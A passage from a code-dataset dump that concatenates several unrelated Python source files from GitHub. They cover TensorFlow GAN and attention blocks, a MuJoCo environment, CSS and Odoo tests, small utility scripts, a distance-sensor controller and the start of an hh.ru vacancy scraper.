affine(enc_out_dim: int, fan_out: int, block_name: str = \"affine\", storage: list = None):\n gamma_dense_1 = dense(fan_in=enc_out_dim, fan_out=256, add_bias=True, storage=storage, block_name=f\"aff_gm_1_{block_name}\")\n gamma_dense_2 = dense(fan_in=256, fan_out=fan_out, add_bias=True, storage=storage, block_name=f\"aff_gm_2_{block_name}\")\n\n beta_dense_1 = dense(fan_in=enc_out_dim, fan_out=256, add_bias=True, storage=storage, block_name=f\"aff_bt_1_{block_name}\")\n beta_dense_2 = dense(fan_in=256, fan_out=fan_out, add_bias=True, storage=storage, block_name=f\"aff_bt_2_{block_name}\")\n\n def process(x: tf.Tensor, enc_out: tf.Tensor) -> tf.Tensor:\n gamma = gamma_dense_2(tf.nn.relu(gamma_dense_1(enc_out)))\n gamma = tf.reshape(gamma, [tf.shape(gamma)[0], 1, 1, tf.shape(gamma)[1]])\n beta = beta_dense_2(tf.nn.relu(beta_dense_1(enc_out)))\n beta = tf.reshape(beta, [tf.shape(beta)[0], 1, 1, tf.shape(beta)[1]])\n\n return gamma * x + beta\n\n return process\n\n\ndef g_base_block(\n enc_out_dim: int, fan_out: int, block_name: str = \"base_block\", storage: list = None\n):\n init_x = const_init_w(shape=[1, 4, 4, 512], amp=1.0, name=\"init_w\", storage=storage)\n\n affine_node_0 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_0\"\n )\n affine_node_1 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_1\"\n )\n conv2d_node = conv2d(\n fan_in=512,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n\n def process(enc_out_flat: tf.Tensor, batch_size: int) -> tf.Tensor:\n x = tf.tile(init_x, [batch_size, 1, 1, 1])\n x = instance_norm(tf.nn.leaky_relu(x, alpha=0.2))\n x = affine_node_0(x, enc_out_flat)\n\n # Conv\n return affine_node_1(instance_norm(tf.nn.leaky_relu(conv2d_node(x), alpha=0.2)), enc_out_flat)\n\n return process\n\n\ndef c_base_block(\n fan_in: int,\n fan_out_conv: int,\n fan_mid: int,\n label_dim: int = 0,\n group_dim: int = 4,\n block_name: str = \"base_block\",\n storage: list = None,\n):\n conv_node = conv2d(\n fan_in=fan_in + 1,\n f_maps=fan_out_conv,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n dense_node = dense(\n fan_in=16 * fan_out_conv,\n fan_out=fan_mid,\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n critic_node = dense(\n fan_in=fan_mid,\n fan_out=1 + label_dim,\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_c\",\n )\n\n def process(x: tf.Tensor, enc_out: tf.Tensor) -> tf.Tensor:\n # Conv\n x = std_dev_layer(x, group_dim)\n x = tf.nn.leaky_relu(conv_node(tf.concat([x, enc_out], axis=-1)), alpha=0.2)\n\n # Critic\n x = tf.reshape(x, shape=[-1, 16 * fan_out_conv])\n x = tf.nn.leaky_relu(dense_node(x), alpha=0.2)\n return critic_node(x)\n\n return process\n\n\ndef s_base_block(\n embed_dim: int,\n fan_in: int,\n fan_out_conv: int,\n fan_mid: int,\n block_name: str = \"base_block\",\n storage: list = None,\n):\n conv_node = conv2d(\n fan_in=fan_in,\n f_maps=fan_out_conv,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n dense_node = dense(\n fan_in=16 * fan_out_conv,\n fan_out=fan_mid,\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n embed_node = dense(\n fan_in=fan_mid,\n fan_out=embed_dim,\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_s\",\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n # Conv\n x = tf.nn.leaky_relu(conv_node(x), alpha=0.2)\n\n # 
Critic\n x = tf.reshape(x, shape=[-1, 16 * fan_out_conv])\n x = tf.nn.leaky_relu(dense_node(x), alpha=0.2)\n return embed_node(x)\n\n return process\n\n\ndef g_block(\n fan_in: int, fan_out: int, enc_out_dim: int, block_name: str = \"block\", storage: list = None\n):\n affine_node_0 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_0\"\n )\n affine_node_1 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_1\"\n )\n conv2d_node_0 = up_conv2d(\n fan_in=fan_in,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_0\",\n )\n affine_node_2 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_2\"\n )\n affine_node_3 = affine(\n enc_out_dim=enc_out_dim,\n fan_out=fan_out,\n storage=storage,\n block_name=block_name + \"_3\"\n )\n conv2d_node_1 = conv2d(\n fan_in=fan_out,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_1\",\n )\n\n def process(x: tf.Tensor, enc_out_flat: tf.Tensor) -> tf.Tensor:\n # Conv 0\n x = instance_norm(tf.nn.leaky_relu(conv2d_node_0(x), alpha=0.2))\n \n # Affine 0\n x = tf.nn.leaky_relu(affine_node_0(x, enc_out_flat), alpha=0.2)\n x = tf.nn.leaky_relu(affine_node_1(x, enc_out_flat), alpha=0.2)\n\n # Conv 1\n x = instance_norm(tf.nn.leaky_relu(conv2d_node_1(x), alpha=0.2))\n\n # Affine 1\n x = tf.nn.leaky_relu(affine_node_2(x, enc_out_flat), alpha=0.2)\n x = tf.nn.leaky_relu(affine_node_3(x, enc_out_flat), alpha=0.2)\n\n return x\n\n return process\n\n\ndef c_block(\n fan_in: int,\n fan_mid: int,\n fan_out: int,\n storage: list = None,\n block_name: str = \"block\",\n):\n conv2d_node_0 = conv2d(\n fan_in=fan_in,\n f_maps=fan_out, # fan_mid\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_0\",\n )\n conv2d_node_1 = down_conv2d(\n fan_in=fan_out,\n f_maps=fan_out,\n kernel_hw_dims=(3, 3),\n add_bias=True,\n storage=storage,\n block_name=block_name + \"_1\",\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n # Conv 0\n x = tf.nn.leaky_relu(conv2d_node_0(x), alpha=0.2)\n\n # Down Conv 1\n return tf.nn.leaky_relu(conv2d_node_1(x), alpha=0.2)\n\n return process\n\n\n# TEXT PREPROCESSING BLOCKS ---\ndef embedding(storage: list):\n embed_mtrx = tf.Variable(np.load(f\"{cfg.DIRS.PROC_DATA_DIR}/embed_mtrx_glove.npy\"), name=\"embed\", trainable=False)\n storage.append(embed_mtrx)\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.nn.embedding_lookup(embed_mtrx, x)\n\n return process\n\n\ndef positional_encoding(seq_len: int, seq_dim: int):\n # Compute constant positional encoding\n pos = np.arange(seq_len)[:, np.newaxis]\n idxs = np.arange(seq_dim)[np.newaxis, :]\n angles = 1.0 / np.power(10000.0, ((2*(idxs//2)) / seq_dim))\n pos_enc = pos * angles\n\n pos_enc[:, 0::2] = np.sin(pos_enc[:, 0::2])\n pos_enc[:, 1::2] = np.cos(pos_enc[:, 1::2])\n pos_enc = tf.cast(pos_enc[np.newaxis, ...], dtype=DTYPE)\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.add(x, pos_enc)\n\n return process\n\n\ndef self_attention():\n def process(q: tf.Tensor, k: tf.Tensor, v: tf.Tensor) -> tf.Tensor:\n num = tf.matmul(q, k, transpose_b=True)\n denom = tf.sqrt(tf.cast(tf.shape(k)[-1], dtype=DTYPE))\n attn_arg = num / denom\n return tf.matmul(tf.nn.softmax(attn_arg, axis=-1), v)\n\n return process\n\n\ndef multihead_attention(fan_in: int, num_heads: int, storage: list, block_name: str):\n 
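    # the feature dimension must split evenly across heads: each head attends over its own fan_in // num_heads slice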
assert fan_in % num_heads == 0\n split_dim = fan_in // num_heads\n\n q_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'q_mh_attn_{block_name}')\n k_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'k_mh_attn_{block_name}')\n v_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'v_mh_attn_{block_name}')\n f_dense = dense(fan_in=fan_in, fan_out=fan_in, add_bias=True, storage=storage, block_name=f'f_mh_attn_{block_name}')\n\n attention_mechanism = self_attention()\n\n def _split_tensor(x: tf.Tensor, batch_size: int) -> tf.Tensor:\n shape = [batch_size, -1, num_heads, split_dim]\n x = tf.reshape(x, shape=shape)\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def process(x: tf.Tensor):\n batch_size = int(tf.shape(x)[0])\n\n q = _split_tensor(q_dense(x), batch_size)\n k = _split_tensor(k_dense(x), batch_size)\n v = _split_tensor(v_dense(x), batch_size)\n\n attn = attention_mechanism(q, k, v)\n attn = tf.transpose(attn, perm=[0, 2, 1, 3])\n attn = tf.reshape(attn, shape=[batch_size, -1, fan_in])\n return f_dense(attn)\n\n return process\n\n\ndef seq_proc_block(fan_in: int, fan_mid: int, num_attn_heads: int, storage: list, block_name: str):\n mh_attn = multihead_attention(\n fan_in=fan_in, num_heads=num_attn_heads, storage=storage, block_name=block_name\n )\n dense1 = dense(fan_in=fan_in, fan_out=fan_mid, add_bias=True, storage=storage, block_name=f\"1_{block_name}\")\n dense2 = dense(fan_in=fan_mid, fan_out=fan_in, add_bias=True, storage=storage, block_name=f\"2_{block_name}\")\n\n def process(x: tf.Tensor):\n x = pixel_norm(mh_attn(x) + x)\n\n x_proc = tf.nn.leaky_relu(dense1(x), alpha=0.2)\n x_proc = tf.nn.leaky_relu(dense2(x_proc), alpha=0.2)\n return pixel_norm(x + x_proc)\n\n return process\n\n\ndef seq2channel_attn(fan_in: int, fan_mid: int, num_channels: int, storage: list):\n reduce_dense_1 = dense(fan_in=fan_in, fan_out=fan_mid, add_bias=True, storage=storage, block_name=\"reduce_1\")\n reduce_dense_2 = dense(fan_in=fan_mid, fan_out=16, add_bias=True, storage=storage, block_name=\"reduce_2\")\n\n attn_dense_1 = dense(fan_in=16, fan_out=32, add_bias=True, storage=storage, block_name=\"seq2chn_1\")\n attn_dense_2 = dense(fan_in=32, fan_out=num_channels, add_bias=True, storage=storage, block_name=\"seq2chn_2\")\n\n def process(x: tf.Tensor) -> tf.Tensor:\n # Reduce tensor dimensionality from [NxTxD1] to [NxTxD], where D << D1\n x = pixel_norm(tf.nn.leaky_relu(reduce_dense_1(x)))\n x = pixel_norm(tf.nn.leaky_relu(reduce_dense_2(x)))\n\n # Compute [NxTxC] tensor of sequence attn weights per every channel c_n\n alphas = tf.nn.softmax(attn_dense_2(tf.nn.leaky_relu(attn_dense_1(x), alpha=0.2)), axis=1)\n\n # Weight reduced tensor to [NxDxC] as attn weighted sum of sequences per channel\n x = tf.matmul(tf.transpose(x, perm=[0, 2, 1]), alphas)\n\n # Reshape tensor fo feature maps [N, C]\n return tf.reduce_mean(x, axis=1)\n\n return process\n","repo_name":"vrobell/txt2img_gan","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":18348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39719491174","text":"import numpy as np\nfrom gym import utils\nfrom gym.envs.mujoco import mujoco_env\n\nimport mujoco_py\n\nclass PusherEnv(mujoco_env.MujocoEnv, utils.EzPickle):\n def __init__(self):\n utils.EzPickle.__init__(self)\n mujoco_env.MujocoEnv.__init__(self, 'pusher.xml', 5)\n\n def step(self, 
a):\n vec_1 = self.get_body_com(\"object\") - self.get_body_com(\"tips_arm\")\n vec_2 = self.get_body_com(\"object\") - self.get_body_com(\"goal\")\n\n reward_near = - np.linalg.norm(vec_1)\n reward_dist = - np.linalg.norm(vec_2)\n reward_ctrl = - np.square(a).sum()\n reward = reward_dist + 0.1 * reward_ctrl + 0.5 * reward_near\n\n self.do_simulation(a, self.frame_skip)\n ob = self._get_obs()\n done = False\n return ob, reward, done, dict(reward_dist=reward_dist,\n reward_ctrl=reward_ctrl)\n\n def viewer_setup(self):\n self.viewer.cam.trackbodyid = -1\n self.viewer.cam.distance = 4.0\n\n def reset_model(self):\n qpos = self.init_qpos\n\n self.goal_pos = np.asarray([0, 0])\n while True:\n self.cylinder_pos = np.concatenate([\n self.np_random.uniform(low=-0.3, high=0, size=1),\n self.np_random.uniform(low=-0.2, high=0.2, size=1)])\n if np.linalg.norm(self.cylinder_pos - self.goal_pos) > 0.17:\n break\n\n qpos[-4:-2] = self.cylinder_pos\n qpos[-2:] = self.goal_pos\n qvel = self.init_qvel + self.np_random.uniform(low=-0.005,\n high=0.005, size=self.model.nv)\n qvel[-4:] = 0\n self.set_state(qpos, qvel)\n return self._get_obs()\n\n def _get_obs(self):\n return np.concatenate([\n self.sim.data.qpos.flat[:7],\n self.sim.data.qvel.flat[:7],\n self.get_body_com(\"tips_arm\"),\n self.get_body_com(\"object\"),\n self.get_body_com(\"goal\"),\n ])\n","repo_name":"AI4Finance-Foundation/FinRL-Tutorials","sub_path":"DQN-DDPG_Stock_Trading/gym/envs/mujoco/pusher.py","file_name":"pusher.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":599,"dataset":"github-code","pt":"18"} +{"seq_id":"71829833641","text":"from chope.css import Css, px, rem, percent, in_\n\nexpected = '''h1 {\n color: red;\n font-size: 1.2rem;\n padding: 1in;\n margin: 2%;\n outline: 1px dotted green;\n}\n\n.my-class {\n background: black;\n}'''\n\n\ndef test_should_render_css_correctly():\n style = Css[\n 'h1': dict(\n color='red',\n font_size=rem/1.2,\n padding=in_/1,\n margin=percent/2,\n outline=(px/1, 'dotted', 'green')\n ),\n '.my-class': dict(\n background='black'\n )\n ]\n\n assert style.render(3) == expected\n\ndef test_when_indent_is_zero_should_render_flat_string():\n expected = 'a {b: c;}d {e: f;}'\n\n style = Css['a': dict(b='c'), 'd': dict(e='f')]\n\n assert style.render(0) == expected\n","repo_name":"hanstjua/chope","sub_path":"tests/test_css.py","file_name":"test_css.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"34975676250","text":"import networkx as nx\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom get_model_parameters import get_marriage_distances_kolton, test_find_distances_bio\nnodes = [1, 2, 4, 5, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23]\nparent_child_edges = [(22, 18), (22,19), (18, 14),\n (19, 15), (14, 10),\n (15, 11), (10, 4), (10, 5),\n (11, 6), (11, 7), (4,1), (5,23),\n (6, 23), (7, 2)]\nmarriage_edges = [(5,6), (1,2)]\nG = nx.DiGraph()\nG.add_nodes_from(nodes)\nG.add_edges_from(parent_child_edges)\n\n\ndistances, num_inf_marriages, percent_inf_marraiges = get_marriage_distances_kolton(G, marriage_edges, plot=True)\ndistances\ndistances2, count2 = test_find_distances_bio(G, parent_child_edges, marriage_edges)\ndistances2\nplt.hist(distances2, bins=[k for k in range(max(distances2) + 2)], range=(0, max(distances) + 
2))\n","repo_name":"js-808/FamilyNetworksResearch","sub_path":"Model/counter_example.py","file_name":"counter_example.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32366465017","text":"from odoo import fields\nfrom odoo.exceptions import ValidationError\nfrom odoo.tests.common import Form, TransactionCase\n\n\nclass TestGovPurchaseWorkAcceptance(TransactionCase):\n def setUp(self):\n super().setUp()\n # Model\n self.purchase_request_model = self.env[\"purchase.request\"]\n self.purchase_order_model = self.env[\"purchase.order\"]\n self.procurement_committee_model = self.env[\"procurement.committee\"]\n self.config_setting = self.env[\"res.config.settings\"]\n self.wiz = self.env[\"purchase.request.line.make.purchase.requisition\"]\n # Data Test\n self.product1 = self.env.ref(\"product.product_product_7\")\n self.procurement_type1 = self.env.ref(\n \"l10n_th_gov_purchase_request.procurement_type_001\"\n )\n self.procurement_method1 = self.env.ref(\n \"l10n_th_gov_purchase_request.procurement_specific\"\n )\n self.purchase_type3 = self.env.ref(\n \"l10n_th_gov_purchase_request.purchase_type_003\"\n )\n self.pr_exception = self.env.ref(\"l10n_th_gov_purchase_request.pr_exception_4\")\n self.employee = self.env.ref(\"base.user_demo\")\n self.employee1 = self.env.ref(\"hr.employee_hne\")\n self.employee2 = self.env.ref(\"hr.employee_lur\")\n self.employee3 = self.env.ref(\"hr.employee_jgo\")\n self.res_partner = self.env.ref(\"base.res_partner_12\")\n self.date_now = fields.Datetime.now()\n self.main_company = self.env.ref(\"base.main_company\")\n\n # Enable WA Evaluation\n with Form(self.config_setting) as c:\n c.group_enable_eval_on_wa = True\n c.save()\n self.config_setting.create({\"group_enable_eval_on_wa\": True}).execute()\n\n def _create_work_acceptance(self, qty, po=False, committees=False):\n work_acceptance = self.env[\"work.acceptance\"].create(\n {\n \"purchase_id\": po and po.id or False,\n \"partner_id\": self.res_partner.id,\n \"responsible_id\": self.employee.id,\n \"date_due\": self.date_now,\n \"date_receive\": self.date_now,\n \"company_id\": self.main_company.id,\n \"wa_line_ids\": [\n (\n 0,\n 0,\n {\n \"purchase_line_id\": po and po.order_line[0].id or False,\n \"product_id\": po\n and po.order_line[0].product_id.id\n or self.service_product.id,\n \"name\": po\n and po.order_line[0].name\n or self.service_product.name,\n \"price_unit\": po\n and po.order_line[0].price_unit\n or self.service_product.standard_price,\n \"product_uom\": po\n and po.order_line[0].product_uom.id\n or self.service_product.uom_id.id,\n \"product_qty\": qty,\n },\n )\n ],\n \"work_acceptance_committee_ids\": committees,\n }\n )\n return work_acceptance\n\n def test_01_gov_purchase_request_to_work_acceptance(self):\n \"\"\"Process Purchase Request until work acceptance and committee must approve WA\"\"\"\n committees = [\n (\n 0,\n 0,\n {\n \"employee_id\": self.employee1.id,\n \"approve_role\": \"chairman\",\n \"committee_type\": \"work_acceptance\",\n },\n ),\n (\n 0,\n 0,\n {\n \"employee_id\": self.employee2.id,\n \"approve_role\": \"committee\",\n \"committee_type\": \"work_acceptance\",\n },\n ),\n (\n 0,\n 0,\n {\n \"employee_id\": self.employee3.id,\n \"approve_role\": \"committee\",\n \"committee_type\": \"work_acceptance\",\n },\n ),\n ]\n purchase_request = self.purchase_request_model.create(\n {\n \"procurement_type_id\": self.procurement_type1.id,\n \"procurement_method_id\": 
self.procurement_method1.id,\n \"line_ids\": [\n (\n 0,\n 0,\n {\n \"estimated_cost\": 100.0,\n \"product_qty\": 1,\n \"product_id\": self.product1.id,\n \"product_uom_id\": self.env.ref(\"uom.product_uom_unit\").id,\n },\n )\n ],\n \"work_acceptance_committee_ids\": committees,\n }\n )\n purchase_request.button_to_approve()\n purchase_request.with_context(to_substate_sequence=20).action_to_substate()\n purchase_request.button_approved()\n # Create purchase agreement from purchase request\n wiz = self.wiz.with_context(\n active_model=\"purchase.request.line\",\n active_ids=[purchase_request.line_ids.id],\n active_id=purchase_request.line_ids.id,\n ).create({})\n wiz.make_purchase_requisition()\n purchase_request_line = purchase_request.line_ids\n requisition = purchase_request_line.requisition_lines.requisition_id\n requisition_line = requisition.line_ids\n requisition_line.price_unit = 100.0\n requisition.action_in_progress()\n requisition.action_open()\n # Create Purchase from Agreement\n purchase = self.purchase_order_model.create(\n {\n \"partner_id\": self.res_partner.id,\n \"requisition_id\": requisition.id,\n }\n )\n purchase._onchange_requisition_id()\n purchase.button_confirm()\n # Check WA default\n res = purchase.with_context(create_wa=True).action_view_wa()\n ctx = res.get(\"context\")\n work_acceptance = Form(self.env[\"work.acceptance\"].with_context(ctx))\n self.assertEqual(work_acceptance.state, \"draft\")\n self.assertEqual(len(work_acceptance.work_acceptance_committee_ids), 3)\n self.assertTrue(work_acceptance.wa_tier_validation)\n for committee in committees:\n del committee[2][\"committee_type\"]\n work_acceptance = self._create_work_acceptance(1, purchase, committees)\n eval_resuls = work_acceptance.evaluation_result_ids\n # Set score evaluation\n eval_resuls[0].score_id = eval_resuls[0].case_id.score_ids[0]\n eval_resuls[1].score_id = eval_resuls[1].case_id.score_ids[0]\n eval_resuls[2].score_id = eval_resuls[2].case_id.score_ids[0]\n eval_resuls[3].score_id = eval_resuls[3].case_id.score_ids[0]\n eval_resuls[4].score_id = eval_resuls[4].case_id.score_ids[0]\n eval_resuls[5].score_id = eval_resuls[5].case_id.score_ids[0]\n # Paperless must tier validation first\n with self.assertRaises(ValidationError):\n work_acceptance.button_accept()\n # Check exception in process tier validation\n res = work_acceptance._get_under_validation_exceptions()\n self.assertEqual(\"evaluation_result_ids\", res[-1])\n # Start Tier Validation\n work_acceptance.request_validation()\n work_acceptance.invalidate_cache() # Needed to refresh review_ids field\n work_acceptance.review_ids.write({\"status\": \"approved\"})\n # Normally, this function will automate from tier server action\n work_acceptance.work_acceptance_committee_ids.write({\"status\": \"accept\"})\n self.assertEqual(work_acceptance.completeness, 100.0)\n # Test restart tier, status and note must be clear\n self.assertTrue(work_acceptance.work_acceptance_committee_ids[0].status)\n work_acceptance.restart_validation()\n self.assertFalse(work_acceptance.work_acceptance_committee_ids[0].status)\n\n work_acceptance.request_validation()\n work_acceptance.invalidate_cache() # Needed to refresh review_ids field\n work_acceptance.review_ids.write({\"status\": \"approved\"})\n work_acceptance.work_acceptance_committee_ids.write({\"status\": \"accept\"})\n work_acceptance.button_accept()\n self.assertEqual(work_acceptance.state, 
\"accept\")\n","repo_name":"OCA/l10n-thailand","sub_path":"l10n_th_gov_work_acceptance/tests/test_gov_purchase_work_acceptance.py","file_name":"test_gov_purchase_work_acceptance.py","file_ext":"py","file_size_in_byte":8594,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"18"} +{"seq_id":"38542476295","text":"import os\r\nos.chdir(\"D:\\\\\")\r\nmyFile = open(\"new 4.txt\",encoding= 'utf-8')\r\nmyContent = myFile.readlines()\r\nsumctm = 0\r\ncount = 0\r\nfor x in myContent:\r\n x=str(x)\r\n y = x.find('资产信息表中的每支股票的交易费用: ')\r\n ctms = x[y+18:-1]\r\n sumctm = sumctm+float(ctms)\r\n\r\n print(sumctm)\r\n\r\n\r\n\r\n","repo_name":"maodan-maodan/test","sub_path":"OKR项目实践/平均值1.py","file_name":"平均值1.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38814438155","text":"\n\n\ndef split_function(dict):\n no_of_person = 5\n arr = []\n string1 = input(\"Enter the element\")\n\n split1 = string1.split(\",\")\n for i in split1:\n if arr[i] == dict.keys():\n dict.update(arr[i + 1])\n print(dict)\n\nsplit_function({'A': 0, 'B': 0, 'C': 0, 'D': 0, 'E': 0})\n","repo_name":"Udhaya19/python-beginner","sub_path":"Day7/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39803015750","text":"import sqlite3\nimport datetime\n\ndef addImage(image_name, present_teeth_text):\n # Connecting to database\n conn = sqlite3.connect(\"db.sqlite3\")\n c = conn.cursor()\n\n now = datetime.datetime.now()\n input_image = \"Images/{}.jpg\".format(image_name)\n output_image = \"OutputImages/{}.jpg\".format(image_name)\n thresh_image = \"ThreshImages/Images/{}.jpg\".format(image_name_text)\n \n c.execute(\n \"INSERT INTO imageDisp_pantomograminfo (present_teeth_text, image_name_text, input_image, output_image, thresh_image, pub_date) VALUES (?,?,?,?,?,?)\",\n (present_teeth_text, image_name, input_image, output_image, thresh_image, now))\n\n\n","repo_name":"bhruszka/Bachelor-Thesis-App","sub_path":"PracaInzWebApp/addImageToDB.py","file_name":"addImageToDB.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2436443566","text":"import re\n\n\ndef get_ordinal_number(word):\n # 判断pattern\n\n pattern = r'(\\d+)(st|nd|rd|th)'\n match = re.search(pattern, word)\n if match:\n print(match)\n number = int(match.group(1))\n return number\n\n ordinals = {\n 'last': -1,\n 'first': 1,\n '1st': 1,\n 'second': 2,\n '2nd': 2,\n 'third': 3,\n '3rd': 3,\n 'fourth': 4,\n '4th': 4,\n 'fifth': 5,\n '5th': 5,\n 'sixth': 6,\n '6th': 6,\n 'seventh': 7,\n '7th': 7,\n 'eighth': 8,\n '8th': 8,\n 'ninth': 9,\n '9th': 9,\n 'tenth': 10,\n 'eleventh': 11,\n '32rd': 32\n }\n return ordinals.get(word.lower(), None)\n\n\ndef analyze_gpt(text):\n results = []\n data_list = text.split(' || ')\n for item in data_list:\n item_list = item.split(' (')\n results.append((item_list[0], item_list[1][:-1]))\n formatted_list = []\n for president in results:\n name, term = president\n start_date = term.strip()\n end_date = start_date # 默认与起始时间相同\n if '-' in term:\n start_date, end_date = term.split('-')\n start_date = start_date.strip()\n end_date = end_date.strip()\n if end_date.lower() == 'present':\n end_date = '2099'\n formatted_list.append([name, start_date, end_date])\n return 
\n","repo_name":"Europix/TemporalQA","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6467744980","text":"from win10toast import ToastNotifier\nimport time\n\nclass Notificaciones:\n\n    def notificar(self, titulo,mensaje):\n        toaster = ToastNotifier()\n\n        toaster.show_toast(\n            titulo + \"!\", mensaje, threaded = True,\n            icon_path=None, duration=6)\n\n        while toaster.notification_active():\n            time.sleep(0.1)\n","repo_name":"Jcamposlozano/SeguimientoSv","sub_path":"Notificaciones.py","file_name":"Notificaciones.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74088907240","text":"import time\nfrom datetime import datetime\n\n\nclass DistanceSensorController:\n    def __init__(self, triggerPin, echoPin, gpio):\n        self.triggerPin = triggerPin\n        self.echoPin = echoPin\n        self.gpio = gpio\n        self.measuring = False\n\n    def getDistance(self):\n        print(\"Calculating distance\")\n        self.gpio.output(self.triggerPin, self.gpio.HIGH)\n        time.sleep(0.00001)\n        self.gpio.output(self.triggerPin, self.gpio.LOW)\n\n        # initialise both timestamps so they are defined even if an echo edge\n        # is missed and one of the loops never runs\n        pulse_start_time = pulse_end_time = time.time()\n        while self.gpio.input(self.echoPin) == 0:\n            pulse_start_time = time.time()\n        while self.gpio.input(self.echoPin) == 1:\n            pulse_end_time = time.time()\n\n        pulse_duration = pulse_end_time - pulse_start_time\n\n        distance = round(pulse_duration * 17150, 2)\n\n        print(\"Distance:\",distance,\"cm\")\n        return distance\n\n    def startMeasuring(self, outputTarget, outputTargetName, cycleLength=60000):\n        self.measuring = True\n        start_timestamp = datetime.utcnow()\n        measured = False\n        while self.measuring:\n            lapsedTime = datetime.utcnow() - start_timestamp\n            # lapsedTime is a timedelta; convert it to milliseconds before\n            # comparing with cycleLength (the original compared a timedelta\n            # to an int, which raises a TypeError)\n            if lapsedTime.total_seconds() * 1000 < cycleLength:\n                if not measured:\n                    outputTarget[outputTargetName] = self.getDistance()\n                    measured = True\n            else:\n                start_timestamp = datetime.utcnow()\n                measured = False\n\n    def stopMeasuring(self):\n        self.measuring = False\n\n","repo_name":"emper911/outdoor_pi_controller","sub_path":"app/DistanceSensor.py","file_name":"DistanceSensor.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10933623706","text":"from PIL import ImageFont, ImageDraw\n\n\ndef make_great_cover(image, text):\n    # parameter renamed from 'str' so it no longer shadows the builtin\n    font_size = 30\n    font = ImageFont.truetype(\"/home/KrozeRoll/mysite/wrift.ttf\", font_size)\n    text_size = font.getsize(text)\n\n    draw = ImageDraw.Draw(image)\n\n    h = image.size[1]\n    w = image.size[0]\n\n    draw.text(((w - text_size[0]) / 2, h - text_size[1] - 10), text,\n              font=font, fill=\"white\")\n    return image\n","repo_name":"KrozeRoll/vk-public-bot","sub_path":"coverMaking.py","file_name":"coverMaking.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"20905319304","text":"import logging\n\nimport requests\nfrom itertools import count\n\nfrom dotenv import dotenv_values\nfrom terminaltables import AsciiTable\n\n\ndef get_vacancies_hh(language):\n    url = \"https://api.hh.ru/vacancies\"\n    vacancies_pages = []\n\n    for page in count(0):\n        payload = {\n            \"text\": f\"Программист {language}\",  # Russian for \"Programmer\"; hh.ru expects the Russian keyword\n            \"area\": 1,\n            \"page\": page,\n            \"per_page\": 100\n        }\n        response = requests.get(url, params=payload)\n        response.raise_for_status()\n        vacancies_page = response.json()\n        if not vacancies_page[\"found\"]:\n            
